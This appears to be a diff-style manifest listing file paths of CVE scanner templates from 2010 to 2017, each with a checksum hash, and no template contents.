+http/cves/2010/CVE-2010-2680.yaml:33254abfbded939b31380b0e03979610b2a1b5f8 +http/cves/2010/CVE-2010-2682.yaml:fefc559be445814e72a0a2fbf688c4bba8b2dc10 +http/cves/2010/CVE-2010-2857.yaml:3f7e3dae32fc9e1cea7e06db2ade17c64c07d61a +http/cves/2010/CVE-2010-2861.yaml:4444dd5b4451ce8858b3cc9096c2b96c0d1c99b3 +http/cves/2010/CVE-2010-2918.yaml:4c29b1b146cd15863b92d5f31ceb7d9b6c0eb0a8 +http/cves/2010/CVE-2010-2920.yaml:e18f1b209a370f72c0004abcda664be95ba4c0a4 +http/cves/2010/CVE-2010-3203.yaml:f99bc34d492999d3cfef1f06bdbf7f488c9abc38 +http/cves/2010/CVE-2010-3426.yaml:e388368ef9ea81d2a61f84584f0553bf9ee11b7d +http/cves/2010/CVE-2010-4231.yaml:db4e971d2be38f98e081dbe31fc832ba1cfce39c +http/cves/2010/CVE-2010-4239.yaml:ef007722afc5cbb271d7ca47a1549ca7f7cf8fe9 +http/cves/2010/CVE-2010-4282.yaml:db73f053b2399c408f8717a89c287166827b8521 +http/cves/2010/CVE-2010-4617.yaml:7eeb28bbd6588f7389bbaae49d1ad856ac6a376b +http/cves/2010/CVE-2010-4719.yaml:6cc07656b912edacf8203183172e36d40e5ea995 +http/cves/2010/CVE-2010-4769.yaml:b437ed40b16456429bdfadbbd6e9a87ca9c74c76 +http/cves/2010/CVE-2010-4977.yaml:6af4d0061cf555962007125b9db0fde0d21f5c37 +http/cves/2010/CVE-2010-5028.yaml:1c50c807b01b5ef6ea499066249aca3df89eada8 +http/cves/2010/CVE-2010-5278.yaml:d08bafe1003b852b203b0518a97954089d81d70a +http/cves/2010/CVE-2010-5286.yaml:5db310295962d8db88454367caed14c29455d7eb +http/cves/2011/CVE-2011-0049.yaml:d02e901c8f2d60edb9f47eb79a7869f30480b705 +http/cves/2011/CVE-2011-1669.yaml:8ed025a5e765afc4436417fbc90d8b008fee7c45 +http/cves/2011/CVE-2011-2744.yaml:ed1f1d4404964e37f62d8254b9401bab41c35b8a +http/cves/2011/CVE-2011-2780.yaml:86135ed458520bf802784c9cb926c4fd94735a1a +http/cves/2011/CVE-2011-3315.yaml:0ad4b69ba4cf3995cd9f8ef79c8c403f225dfc9c +http/cves/2011/CVE-2011-4336.yaml:cc465bab1b8887019ce51c94a38dcc59fe2563ad +http/cves/2011/CVE-2011-4618.yaml:05b2b2a56ba81f18efd1f480fe932f6023311612 +http/cves/2011/CVE-2011-4624.yaml:5abc56d51c278d9e26d21e5ca7ad5385b704f4ce +http/cves/2011/CVE-2011-4804.yaml:6e3322eba987e80072ee73c2bd7598696b1b98dd +http/cves/2011/CVE-2011-4926.yaml:915f75cad4a92dd854753798548b0b76d2501b51 +http/cves/2011/CVE-2011-5106.yaml:9d3e72a8c863eb8355659d01853edf5f5b581456 +http/cves/2011/CVE-2011-5107.yaml:3cfd8f6b8576834fa38ce5c65f75a92dca5d4d4c +http/cves/2011/CVE-2011-5179.yaml:4cf54bede22fbcd1d8ac79fa3abdeb225534b1bc +http/cves/2011/CVE-2011-5181.yaml:91f3fcb9362afecb0caca107cbf1ac2e6e6736fc +http/cves/2011/CVE-2011-5252.yaml:778c9c8a1f3b2802ddec5d834df59efd8a2df601 +http/cves/2011/CVE-2011-5265.yaml:a38be5371cc6634b1dcd82757149ce425e91d308 +http/cves/2012/CVE-2012-0392.yaml:40ff7c2eafc9d6490e89abda67b693e651fab6d4 +http/cves/2012/CVE-2012-0394.yaml:00e1bb95c00439704582c3867bf60d5a763a407f +http/cves/2012/CVE-2012-0896.yaml:54bf1bf5bdf74e17da383a7f6fb8d3cb65f093c5 +http/cves/2012/CVE-2012-0901.yaml:c581379703d144a3227c6f722835ab8e48fe172b +http/cves/2012/CVE-2012-0981.yaml:a522374127c43ab1de8cf6d8564e717033ef7c89 +http/cves/2012/CVE-2012-0991.yaml:1002cbbd6fdf8eacaf82ee219bbf45f9cf7dda1e +http/cves/2012/CVE-2012-0996.yaml:48baaee952f8aa6be0cfe419f5d89e15a98c916f +http/cves/2012/CVE-2012-1226.yaml:d77cd3977c9766e6fa11e0851ec521029d8d4c0c +http/cves/2012/CVE-2012-1823.yaml:8a9cfee0eaca4eae36f3c57810f99f48fc1e5493 +http/cves/2012/CVE-2012-1835.yaml:e43241cb5940ca1a2b695ed4808a778ea9c58440 +http/cves/2012/CVE-2012-2371.yaml:c14cb4be1e4795dddde17db6fa671bb1ab5132bd +http/cves/2012/CVE-2012-3153.yaml:9416c72d3dddb990c80df9d2477f13d6ed390eb8 +http/cves/2012/CVE-2012-4032.yaml:66101d5e8879ec06ec1605acba9e0c409b9ef1a8 +http/cves/2012/CVE-2012-4242.yaml:57865742e4412aa5fb3ce06d8c768415e2ab2acd +http/cves/2012/CVE-2012-4253.yaml:65291c67421086a3438fc55df8909ceb8e19b662 +http/cves/2012/CVE-2012-4273.yaml:30fddd3d0fe3c7cd555800972f133f64e8d6ef48 +http/cves/2012/CVE-2012-4547.yaml:da453f6f0b56aba41a1024ceb2cd0828469e93b6 +http/cves/2012/CVE-2012-4768.yaml:bf8b2d19e12bf41a62d6082b2a49cca26e2211b3 +http/cves/2012/CVE-2012-4878.yaml:76e1e8786658eb85b90e63d802e4f33d53c12850 +http/cves/2012/CVE-2012-4889.yaml:ced5e9593787611449850886dbdf7d8a2acf0ac9 +http/cves/2012/CVE-2012-4940.yaml:2a0afcc9871919c18e36e06973dcaf9951ced9be +http/cves/2012/CVE-2012-4982.yaml:976f37c7f2b4b91efee896e2bd6ec90d1ddabc3a +http/cves/2012/CVE-2012-5321.yaml:7aa9e959bb1522c26edcab1a6a3365636748ffa1 +http/cves/2012/CVE-2012-5913.yaml:af44ce6eba30ba3d254eac3ab315b882b5af801b +http/cves/2012/CVE-2012-6499.yaml:d99ac8c67d92e9f6d81fa86a606fcf933493f23c +http/cves/2013/CVE-2013-1965.yaml:c3cf9a3ae694b9af16955665cbef1299a2392b79 +http/cves/2013/CVE-2013-2248.yaml:60109fc1a86db2f1035a262aa7636a8cb6b4a929 +http/cves/2013/CVE-2013-2251.yaml:08568f8d2586b4b1e99930ffee5f3a7a409e3c0e +http/cves/2013/CVE-2013-2287.yaml:614b60e6a3b6080fae2c1525edb468484c5976e9 +http/cves/2013/CVE-2013-2621.yaml:97021411eb926b693860d548780566021f454e41 +http/cves/2013/CVE-2013-3526.yaml:81354b6f41e2d2ac6e0d982d6a6416fa3c9bcbaa +http/cves/2013/CVE-2013-3827.yaml:037ae365c7b33c1409fa2cfe57da0a8833bfe46a +http/cves/2013/CVE-2013-4117.yaml:87d37ef70904a07f92299d76164128c30cf4a035 +http/cves/2013/CVE-2013-4625.yaml:16b2d9be044ee1ba9e0695492b0ce3d6a7ae36f9 +http/cves/2013/CVE-2013-5528.yaml:5c478afe624ebc42382762b54e2712309c63bb87 +http/cves/2013/CVE-2013-5979.yaml:6bc931bf478f9809a677aa43be24f3a88e328c7e +http/cves/2013/CVE-2013-6281.yaml:ac2a396458dae279ee5699cb663f57ba753c66e9 +http/cves/2013/CVE-2013-7091.yaml:2adf85dbd9056272abedb535705f0212cf7d4264 +http/cves/2013/CVE-2013-7240.yaml:db80fbc4b5cf997ee701ef78865dfb5cbb382d81 +http/cves/2013/CVE-2013-7285.yaml:c7068d71749691932ca8516da9f8dc1c62ad343f +http/cves/2014/CVE-2014-10037.yaml:cd973f4837b2517e4df841470a7d40156e5f6710 +http/cves/2014/CVE-2014-1203.yaml:b49ae185ad4a15b92cecea925be7ccd80ad4c630 +http/cves/2014/CVE-2014-2321.yaml:f8dec04b7bcb172d9ef5ee17058aaea87a0706ec +http/cves/2014/CVE-2014-2323.yaml:f023d2527ffd20aafa31e5e59f57e1038986ad5f +http/cves/2014/CVE-2014-2383.yaml:d93c2650e04677cec08d4cfb24958f85c3679258 +http/cves/2014/CVE-2014-2908.yaml:a06812dc32233b99d7338f8d34cb7749dc42996b +http/cves/2014/CVE-2014-2962.yaml:3586a1e9fa3c5937974c2e5aec6b53b74d61dcd4 +http/cves/2014/CVE-2014-3120.yaml:b96d5eb863743321743fd4e2da75f122b98aa242 +http/cves/2014/CVE-2014-3206.yaml:c08c6c72ac14f7684a45d4c56cb8ab487fedcf83 +http/cves/2014/CVE-2014-3704.yaml:f59c218b1c2df283d055b4d2047343a9952da12f +http/cves/2014/CVE-2014-3744.yaml:856b7464857a93136dca3549d1e46cedb798a6ec +http/cves/2014/CVE-2014-4210.yaml:83e767c6b0694b23e61cace2f8faed980cddb5b6 +http/cves/2014/CVE-2014-4513.yaml:f428a7f16fa553a499a0017f12c378348fc9d259 +http/cves/2014/CVE-2014-4535.yaml:5d64f1681ccfd163fb6fe3c6d3383887d256c315 +http/cves/2014/CVE-2014-4536.yaml:c70a3aee16b462bd6ad0d032b3d937df144d19f7 +http/cves/2014/CVE-2014-4539.yaml:4c0db612892790ef259d159d4e728a4ff2f4e4c6 +http/cves/2014/CVE-2014-4544.yaml:77b0f6f83cf101f9ab8ace43d5c8180dba8c4e0c +http/cves/2014/CVE-2014-4550.yaml:a2987929f298a711f76750babc16185af78c3f8e +http/cves/2014/CVE-2014-4558.yaml:a655a13002d8fee9097f0adb64e440845ab22c01 +http/cves/2014/CVE-2014-4561.yaml:254973d328748cf6a65bead95dbc7bc4387140d1 +http/cves/2014/CVE-2014-4592.yaml:dee72ac2190800a233e7aa515d62ac602568d18e +http/cves/2014/CVE-2014-4940.yaml:d0be1746fb12427bf8e376d1fb457ea3dc41eb50 +http/cves/2014/CVE-2014-4942.yaml:0a5942b9a6e329a33aa8396d8e064772df2adb36 +http/cves/2014/CVE-2014-5111.yaml:e717047373ab95d87c6622476d057593af80d230 +http/cves/2014/CVE-2014-5258.yaml:a74b909ab5ad9f2902827317382c7ce133117678 +http/cves/2014/CVE-2014-5368.yaml:68f817e7a2514c1218223eaa4f02f77bcb8f6bb1 +http/cves/2014/CVE-2014-6271.yaml:ac80820cf3da3dfb0620ebaee06b18087978a89a +http/cves/2014/CVE-2014-6287.yaml:e7b94bb6c012b8a7b5d4fad70250cafa6086aab6 +http/cves/2014/CVE-2014-6308.yaml:32349eb9a384c2f031536efa916a57c77f726d28 +http/cves/2014/CVE-2014-8676.yaml:41e46a15cea0bc0fbcda2f18026335e8c53aab49 +http/cves/2014/CVE-2014-8682.yaml:745f5b63e9c1a3470f7cb97e8e9b45a9e0518db0 +http/cves/2014/CVE-2014-8799.yaml:f16bad76936bece209b064156bc8b65fa7c0d66a +http/cves/2014/CVE-2014-9094.yaml:1ed28a4587a3964f7d422308f8c99e236d278328 +http/cves/2014/CVE-2014-9119.yaml:9060a8d07fc17802318794d49c4fd824be3972df +http/cves/2014/CVE-2014-9444.yaml:ba2b35bb4a3b46f3146b159476b05bff3aab43c5 +http/cves/2014/CVE-2014-9606.yaml:5b24ed122c0ca840d115f2d5f91ea47c66b35e5d +http/cves/2014/CVE-2014-9607.yaml:6d9770a3d08c905fd8ae42b2b6b99e164d34e5df +http/cves/2014/CVE-2014-9608.yaml:0a9cb54e8f37d23cd4a706c79819aab8c31d3f9e +http/cves/2014/CVE-2014-9609.yaml:82e854be18284fbcbfd7cf17fa0d4c285c94ddec +http/cves/2014/CVE-2014-9614.yaml:09cb49114f16e6af3cfe682503149cf56fec52ec +http/cves/2014/CVE-2014-9615.yaml:c17679c73c789359ebf6bed2f235cc1f1adaee38 +http/cves/2014/CVE-2014-9617.yaml:ab33c3652f04d9b2bf8dee70f99451b2e3162857 +http/cves/2014/CVE-2014-9618.yaml:8f2390c6a851766f7d09051e73b1340881aeffe0 +http/cves/2015/CVE-2015-0554.yaml:95e4d128577398800b719c18917d0965542cb3ec +http/cves/2015/CVE-2015-1000005.yaml:1267e5c90f330e522e8e5d43ba9ae8b826b62529 +http/cves/2015/CVE-2015-1000010.yaml:3c34b1bda34ecb3833ec33a0a4d19cc9db072855 +http/cves/2015/CVE-2015-1000012.yaml:4f55345f99ce9cb3216bb1d92283051c9f2bc52a +http/cves/2015/CVE-2015-1427.yaml:d1d046bf619adb0edd2805ccbc36adcb9b7e2544 +http/cves/2015/CVE-2015-1503.yaml:e745532608ee6cfa053ca1673aad590121d7b0fd +http/cves/2015/CVE-2015-1579.yaml:8b70fbfcc71f5f518f6dd6a9ffbf34eb2ce4504c +http/cves/2015/CVE-2015-1880.yaml:e67daa2c940de23e8776c7717302c5cbdffb2dfe +http/cves/2015/CVE-2015-2067.yaml:b1ae44ec9e41c9cdbf339c0723e46d0a04f49b4c +http/cves/2015/CVE-2015-2068.yaml:f1cf652452a65bdb9e5b800dd3df0b7ddce9b12a +http/cves/2015/CVE-2015-2080.yaml:c82b6706571540d7b4fbf9dd40d7e2b18a6f21ed +http/cves/2015/CVE-2015-2166.yaml:1f1d19bb804d6ee7feb0f13ad9f1aa52bfdda51e +http/cves/2015/CVE-2015-2196.yaml:e9bfcaca238fa991b9077e45483c01e66a238e87 +http/cves/2015/CVE-2015-2755.yaml:bf31e7b8b1378ea22488e9479c079eb7d97c82dd +http/cves/2015/CVE-2015-2807.yaml:94f57fc32f76db5a7ab536149475b125517b7414 +http/cves/2015/CVE-2015-2863.yaml:c16c4110b5623ad016e5e26dc571e3a517839984 +http/cves/2015/CVE-2015-2996.yaml:0b734d93bff3fc3a9f9013ecc20c41f9e8bef841 +http/cves/2015/CVE-2015-3035.yaml:e7489a90679f0aa3cf2e9e439c62a9eb1d0dea1a +http/cves/2015/CVE-2015-3224.yaml:ae834273be7cb8923a0fbac14d95a425fb15e12e +http/cves/2015/CVE-2015-3337.yaml:59138b4f50a720df3a47d058a97f79aab7de2be2 +http/cves/2015/CVE-2015-3648.yaml:8178a1f5e5128914b37e26f8f902aeb13a0d3eb1 +http/cves/2015/CVE-2015-3897.yaml:c806c78669a2e218a8df2a3df721fa8a85fded37 +http/cves/2015/CVE-2015-4050.yaml:039acab50e310d4c7a5ef0ff0a069721fbbb036f +http/cves/2015/CVE-2015-4062.yaml:73910b122dd5ce8de22cc13eca84bcedd3e88edd +http/cves/2015/CVE-2015-4063.yaml:f844ebc4d92fc2cb464482b640c2a76f85dfb302 +http/cves/2015/CVE-2015-4074.yaml:29b62c344d94dc1908d26f0d7aeb4647f0041539 +http/cves/2015/CVE-2015-4127.yaml:5bf239d70fe24d8c03ddb688788757f0e9a205aa +http/cves/2015/CVE-2015-4414.yaml:e5e5b695fb4ff2196186c799c1fca6189d6a129e +http/cves/2015/CVE-2015-4632.yaml:69719c20d9c7f2eaeb5c16fca693b57cf8d5a982 +http/cves/2015/CVE-2015-4666.yaml:cad1f4c6f2d574b68c6ce8ba4c0690b6937b9c35 +http/cves/2015/CVE-2015-4668.yaml:a7ef52eacc8f0278b3bbaac64fb2d9e1a45b64c2 +http/cves/2015/CVE-2015-4694.yaml:5e8d6bdd3d01c2941b5ff5c9b886d0182642f767 +http/cves/2015/CVE-2015-5354.yaml:b6bef97e181e06c03e0d6f8f0371633a68555f84 +http/cves/2015/CVE-2015-5461.yaml:b3675f6849aef7d5d5e16664db8e0372c58002fd +http/cves/2015/CVE-2015-5469.yaml:e21413b786e2c00f0a1fb715fc49d23a06f1cf3f +http/cves/2015/CVE-2015-5471.yaml:5963c73a995bc99b79167952eb0c8744f1351039 +http/cves/2015/CVE-2015-5531.yaml:cd962836b08272d0a93826b39632f85e1ce89958 +http/cves/2015/CVE-2015-5688.yaml:9aafc192be103311a276772805056a23b37a4289 +http/cves/2015/CVE-2015-6477.yaml:16ab3ec12438438f21b6fc7fb3243e8694e35e0d +http/cves/2015/CVE-2015-6544.yaml:531c5bef892fc62f8c64ec6da9b7cd7ab7a07d96 +http/cves/2015/CVE-2015-6920.yaml:344cecf6a17f7b7d5ed83b598d295bd4afff7ef1 +http/cves/2015/CVE-2015-7245.yaml:885f5df43eeb4a591215a51a924a2bd1f3bfc2bc +http/cves/2015/CVE-2015-7297.yaml:9c31fc283f2a109533bd1855932ac865ca51021d +http/cves/2015/CVE-2015-7377.yaml:1f518dd7c1f10279f68d7976780f90823e0372e3 +http/cves/2015/CVE-2015-7450.yaml:7a363273a9ba70f7aae6b7914123a5741f908ba8 +http/cves/2015/CVE-2015-7780.yaml:b320d432340394ffa1dc099d96484c8e798da90d +http/cves/2015/CVE-2015-7823.yaml:08d872c5aba85ff5b2fb443dcbf592eb32455ff4 +http/cves/2015/CVE-2015-8349.yaml:a439ffb4dfd5ceafc232c03ff0ba1210e4cda706 +http/cves/2015/CVE-2015-8399.yaml:4f4b845efa89b32e67ebc0e1ef41ba6026c3463f +http/cves/2015/CVE-2015-8813.yaml:e53cfc0756cac70a51a28ae4b6ddad1c33241954 +http/cves/2015/CVE-2015-9312.yaml:15e388d87b0ebfec087990c52b32f4dab12d09f9 +http/cves/2015/CVE-2015-9323.yaml:6f883c4162673d4f5b43309c1821195f185c6f6f +http/cves/2015/CVE-2015-9414.yaml:1e6c5dec5159410280f65ce0b34c10df8e0d1115 +http/cves/2015/CVE-2015-9480.yaml:606bab4f61f7952dfaa956929f77f3fa4b7017c6 +http/cves/2016/CVE-2016-0957.yaml:2e8db61d74f32037567199f53bba38a7597de6b7 +http/cves/2016/CVE-2016-1000126.yaml:200e13e78dc40fb6853f95021b2b5d31c95f806c +http/cves/2016/CVE-2016-1000127.yaml:eeff65a38cf5e4551e38b55461fbac444bfd4e27 +http/cves/2016/CVE-2016-1000128.yaml:036c054b27c33be7db36a422ce311d6b26fedbe2 +http/cves/2016/CVE-2016-1000129.yaml:23ce658c75c9492f5f751e1a539e399f7bcddbcf +http/cves/2016/CVE-2016-1000130.yaml:f7cbba46ad8678e65594c8f8836fbac73b171f1c +http/cves/2016/CVE-2016-1000131.yaml:e9b5cc8b9f4c5a39df5579053c08039ccd1807c9 +http/cves/2016/CVE-2016-1000132.yaml:3f4a7f52d1199a9956d378e7376c00baa44e2fc8 +http/cves/2016/CVE-2016-1000133.yaml:646a0bc524a70a2c73afe9830cb5d8b861ed03d7 +http/cves/2016/CVE-2016-1000134.yaml:bcea14f1e23381d706aef28dcfbed7df01748e3d +http/cves/2016/CVE-2016-1000135.yaml:18f9f6c7da51d3ca592bb40ccc48831b8167be11 +http/cves/2016/CVE-2016-1000136.yaml:e3df2a9eb52a9c63d70e1894e737d6a8a8d56087 +http/cves/2016/CVE-2016-1000137.yaml:ca82c09ff9f78ed898ed96b058ddc708e722cfe8 +http/cves/2016/CVE-2016-1000138.yaml:2a595e1d9609b4c63eea12fb46658cfa1da8a5ab +http/cves/2016/CVE-2016-1000139.yaml:247c6d15c3e656a9dd2d6c6807853b9a80594b31 +http/cves/2016/CVE-2016-1000140.yaml:c279959a4247aa8a9b64ce2c176c966e83d29af4 +http/cves/2016/CVE-2016-1000141.yaml:3510a688d13f70807120371036a35b494daee81f +http/cves/2016/CVE-2016-1000142.yaml:6dacb544ed8c6c80b4c6cdc45a607aed9497fa37 +http/cves/2016/CVE-2016-1000143.yaml:6ad20f23bdefc2287a51bd65ecf3ccf4ae805cf1 +http/cves/2016/CVE-2016-1000146.yaml:7bc017050d5f7c334f3c949a4d3d60aeb07b0dd9 +http/cves/2016/CVE-2016-1000148.yaml:5bdeaeb43b39098bf09b04166b177641211ba5ad +http/cves/2016/CVE-2016-1000149.yaml:b3d710cfadfef57b5cc80d4f122ebc4d373b33b6 +http/cves/2016/CVE-2016-1000152.yaml:e25c8b79e2c6c6c7fd5b6630b9d114c2ea254fed +http/cves/2016/CVE-2016-1000153.yaml:7d2e8973054a82f9afd5ca66ca50f75460b2dea0 +http/cves/2016/CVE-2016-1000154.yaml:61bd811fbdb2fedb8c28b39aaa6c859a74f37243 +http/cves/2016/CVE-2016-1000155.yaml:f1698e2a12266c19bc49ed8d597990c7386f389f +http/cves/2016/CVE-2016-10033.yaml:f00e2dd47d5b9ecec18936a07ad16d59ea40074c +http/cves/2016/CVE-2016-10108.yaml:bddb21b1471d52c06c320dcdb6c053b57dd55570 +http/cves/2016/CVE-2016-10134.yaml:d3c0f3f5ac5527773515d1d38d87f8af4a881b0a +http/cves/2016/CVE-2016-10367.yaml:6641c570cce6ef480422fac30815a63bcb99b469 +http/cves/2016/CVE-2016-10368.yaml:ec846293049ba00d6caef96095bbe8f83739800b +http/cves/2016/CVE-2016-10924.yaml:6e7f57dcddc9d1c37be6d64c9da64c1cfc52cc99 +http/cves/2016/CVE-2016-10940.yaml:904458c57358e3b4b8628a6983f12b031ffa4c7d +http/cves/2016/CVE-2016-10956.yaml:2f2619f124b225fe2a268f1f0f69db2fa2535ee7 +http/cves/2016/CVE-2016-10960.yaml:36cd6711c988643a1ece706f53a9e5d4a0153d88 +http/cves/2016/CVE-2016-10973.yaml:72cdcfd2ad3bb75f2766a504dc30d46226c1645a +http/cves/2016/CVE-2016-10993.yaml:1c0bd3c8bfbd749118c5489e554061dda48b5e05 +http/cves/2016/CVE-2016-1555.yaml:04a439eeb2d2b8e03d89cf7e7d5aac1d469792ac +http/cves/2016/CVE-2016-2389.yaml:82767e9925522da528a3646fa4def9d6f8ab401e +http/cves/2016/CVE-2016-3081.yaml:140f6efaca3b9883f7c0db8c90e4a0d0a2a7da67 +http/cves/2016/CVE-2016-3088.yaml:64da1d42181cf8e002485ce5c2ad83d218a003d0 +http/cves/2016/CVE-2016-3978.yaml:88f43e54282f984db830bd850a4ddf4fe62e5385 +http/cves/2016/CVE-2016-4437.yaml:5a6e676d43ca9afd7bc9384868e01a6309e775b4 +http/cves/2016/CVE-2016-4975.yaml:fbdfa1e9d73f993f455aa5e28ccfb8d51dfb089b +http/cves/2016/CVE-2016-4977.yaml:f51336e37907b113c0eafbd28373464a5f28a43c +http/cves/2016/CVE-2016-5649.yaml:b863228b5f7ffda189d15a6c0144889b6988fccc +http/cves/2016/CVE-2016-6195.yaml:15f013136bba650a4d40b7087ab3f4bb8f15d7dc +http/cves/2016/CVE-2016-6277.yaml:7da7859ed05d2a1ad86e763a3da069f284cd875f +http/cves/2016/CVE-2016-6601.yaml:2c868c2f08b15b691929d4f4e6e075b35566a401 +http/cves/2016/CVE-2016-7552.yaml:b2472284c780d930c3dd67faf22cbb44974b30e5 +http/cves/2016/CVE-2016-7834.yaml:eb1d819545217487341e83b81b104712e7a8ad54 +http/cves/2016/CVE-2016-7981.yaml:e5cb21bbfae6e9470583bfc1bf09d55e02cc08e1 +http/cves/2016/CVE-2016-8527.yaml:3004c01e32bf7d4bfaa333cbdc5feeeb186d1cc2 +http/cves/2017/CVE-2017-0929.yaml:4923be016e228c9bef5a6264c937dd7e4c57b205 +http/cves/2017/CVE-2017-1000028.yaml:adc06fe3c9b5c9d5ad2f8a19ed0d834c0e841663 +http/cves/2017/CVE-2017-1000029.yaml:c5d55b56ae257647aab8ed2985ae5d1bc636338a +http/cves/2017/CVE-2017-1000163.yaml:89fa1946bf84379183eee34c74ce3116df75494b +http/cves/2017/CVE-2017-1000170.yaml:33c528d0d88c4957d83c47e47de95dc17ed64f91 +http/cves/2017/CVE-2017-1000486.yaml:93821abf0b7b68c95850a40e445754e3a881c48f +http/cves/2017/CVE-2017-10075.yaml:2da0789d118791da3e461b09ef8906739b249e3f +http/cves/2017/CVE-2017-10271.yaml:b91c17740eddbfdf706eb93cf92f040c96c20374 +http/cves/2017/CVE-2017-10974.yaml:0da166f6f80c553012225cbe0a4073fb731c4941 +http/cves/2017/CVE-2017-11165.yaml:0adc23697ffaac93ad0763fc5ca2908fb56001cd +http/cves/2017/CVE-2017-11444.yaml:d63d2cf37c008883adac575ccaf0c3c726c79e1a +http/cves/2017/CVE-2017-11512.yaml:4efe7ae65e4ebc4f0a51705706e41965eb09d2a7 +http/cves/2017/CVE-2017-11586.yaml:42c8717104adebdd353ba62096cf559b092c0cce +http/cves/2017/CVE-2017-11610.yaml:a6b29ae149ebf5d941e57992b319552ac643846f +http/cves/2017/CVE-2017-11629.yaml:9cf76531e205e75dc2ef573eec352a86b5c51901 +http/cves/2017/CVE-2017-12138.yaml:9462bd277c5d204b18e0c953dcbc8dbb8e6f14a3 +http/cves/2017/CVE-2017-12149.yaml:5157d1505a8fe9591df01e967055e726fdc0021c +http/cves/2017/CVE-2017-12542.yaml:870209fb155397d7035b2f199d88a8550b05e537 +http/cves/2017/CVE-2017-12544.yaml:f4f5deeeca700ec4f79fee69d995b47db9bef113 +http/cves/2017/CVE-2017-12583.yaml:02e135d474d8dccb8d8e8007db3f545807798865 +http/cves/2017/CVE-2017-12611.yaml:25e712027ca2b7d084f862c4422dec5bd522eb4b +http/cves/2017/CVE-2017-12615.yaml:27ef582fb504e39a3efb27e363854fb74e5fa151 +http/cves/2017/CVE-2017-12617.yaml:9e23c456353a5d203c9c3e38905fce363186a5d9 +http/cves/2017/CVE-2017-12629.yaml:979e941236d8769df4b15a6da8ef323743c44a70 +http/cves/2017/CVE-2017-12635.yaml:4aff272f214c81d0ed536fd2d3dea463f6e09c5d +http/cves/2017/CVE-2017-12637.yaml:59d4f9394b3d4c432ce4924bc3fd4920d500aa65 +http/cves/2017/CVE-2017-12794.yaml:ca35c54ad0df577b07e69dd6dbd769a9029c7b69 +http/cves/2017/CVE-2017-14135.yaml:9ade6317269fcf946f65c1fe23d5a4821d49ef56 +http/cves/2017/CVE-2017-14186.yaml:82067aa6cc98c6bd15979734ff92203eaf80c300 +http/cves/2017/CVE-2017-14524.yaml:286a9398acef3483fde6ccf9f02314542a6fe685 +http/cves/2017/CVE-2017-14535.yaml:44cfe48fd0ba1b76c866fd77330002bb734f17c4 +http/cves/2017/CVE-2017-14537.yaml:85f2f7c1a0276b5955268d884a07b6103001e927 +http/cves/2017/CVE-2017-14622.yaml:009cc090824157a793ad788ffa8b667ebe4a4578 +http/cves/2017/CVE-2017-14651.yaml:81e53e54afa559d677de2dfb247da54797ab9f9a +http/cves/2017/CVE-2017-14849.yaml:89f1297fc1fb1bb2d1971aeb1a245c165837a135 +http/cves/2017/CVE-2017-15287.yaml:575e08ffef0f9ba3736bc3bb52ecad08f8867ddf +http/cves/2017/CVE-2017-15363.yaml:d603b17feb3f7fcb89b1beaa1671e341c83e4efc +http/cves/2017/CVE-2017-15647.yaml:3b6a65a96e80b64c1f0fad9143d874659bde8305 +http/cves/2017/CVE-2017-15715.yaml:7e37ca9e68af8c8bad4c7be50f055494cd804164 +http/cves/2017/CVE-2017-15944.yaml:2c1f855cbc53834abd8f252d9e3999d1473be76c +http/cves/2017/CVE-2017-16806.yaml:802251cf40fa62282cdecea2436d6dd6497124dc +http/cves/2017/CVE-2017-16877.yaml:0e875556b7f8c8c4da13e50b108187b7b6d97688 +http/cves/2017/CVE-2017-16894.yaml:0a1a6ac6325d01e843e72d4deeee0cdc8ddaf15e +http/cves/2017/CVE-2017-17043.yaml:ac7d7075a0fc4e2b3c70f1c4a843fa1f5358ebc3 +http/cves/2017/CVE-2017-17059.yaml:c96d4a8d2d8df6d2035c09364e0e48d6c69fc00a +http/cves/2017/CVE-2017-17451.yaml:5514ae906206577d89fe90d1bfb0550b0a048918 +http/cves/2017/CVE-2017-17562.yaml:d62eee9cc31b63aea8b9c6ac1eeaec4b2b779e06 +http/cves/2017/CVE-2017-17731.yaml:27c116c37c4a35154e00feb6b52c8c67ec906860 +http/cves/2017/CVE-2017-17736.yaml:101ec47f61f55d556850db21b63631ee330fef0f +http/cves/2017/CVE-2017-18024.yaml:753d067291d82fca91af88f6ffa82b73449d98e2 +http/cves/2017/CVE-2017-18536.yaml:1849058e7a1fbe3538ba981d0617a30f2bd04039 +http/cves/2017/CVE-2017-18598.yaml:92a7ade9a70c49981dbf6315832422f94d482ab9 +http/cves/2017/CVE-2017-18638.yaml:ff2bb81e1d4fdcb5474369b89382309ea95c0ae7 +http/cves/2017/CVE-2017-3506.yaml:bb70520fdfb18265cfe4a573cfdf2d44d8057e41 +http/cves/2017/CVE-2017-3528.yaml:39d3b4ebf9b78d8bf5dbc06b52eccef8bb591375 +http/cves/2017/CVE-2017-4011.yaml:9966b265f6ac1fdad2fee7d7edec593ad8d82abd +http/cves/2017/CVE-2017-5487.yaml:c5f0dbaad97012a47bbfa9d168af81be1f2954a8 +http/cves/2017/CVE-2017-5521.yaml:e7811cb095916427d485b1f5424abc07f929269f +http/cves/2017/CVE-2017-5631.yaml:eb6e889348a5ed9c656bec31eeee752fbb92b38a +http/cves/2017/CVE-2017-5638.yaml:63584fb0c5610ac96fccd6f9cf77ecdc7f3c9ac4 +http/cves/2017/CVE-2017-5689.yaml:6831ebd7885988d2d7ab01c352aadb5221773ed4 +http/cves/2017/CVE-2017-5982.yaml:c855ed9212a94e4787a5668611b8b021b5cffa74 +http/cves/2017/CVE-2017-6090.yaml:b28ac97d26e866b046cfc0e5f8fdf5b30b65d18e +http/cves/2017/CVE-2017-7269.yaml:a126d79265c486b672b3184c3cd3288488fcb853 +http/cves/2017/CVE-2017-7391.yaml:2f36578f07ade78cade7055e250580e377b44993 +http/cves/2017/CVE-2017-7615.yaml:1ba8f02d56144515305328ef82f0650d4ffd2ab4 +http/cves/2017/CVE-2017-7921.yaml:1b44dba0e85615cbc05aaf703305f2d786629d7c +http/cves/2017/CVE-2017-7925.yaml:0ba6378de04152b606ca9a9eb0cdfbbbb7a83809 +http/cves/2017/CVE-2017-8229.yaml:e26fa12c74207b996faf11aad175d1ed7b265425 +http/cves/2017/CVE-2017-8917.yaml:33ca4dd4ac335b5882a69cc282cfa43e44338e43 +http/cves/2017/CVE-2017-9140.yaml:7d21305d0561300f3003494add2d89cc517c8c3f +http/cves/2017/CVE-2017-9288.yaml:e412046a27de9d1083a1c64a01b23d051c09d336 +http/cves/2017/CVE-2017-9416.yaml:537356e8f96feca7d8970ca43e334733e7b7d95f 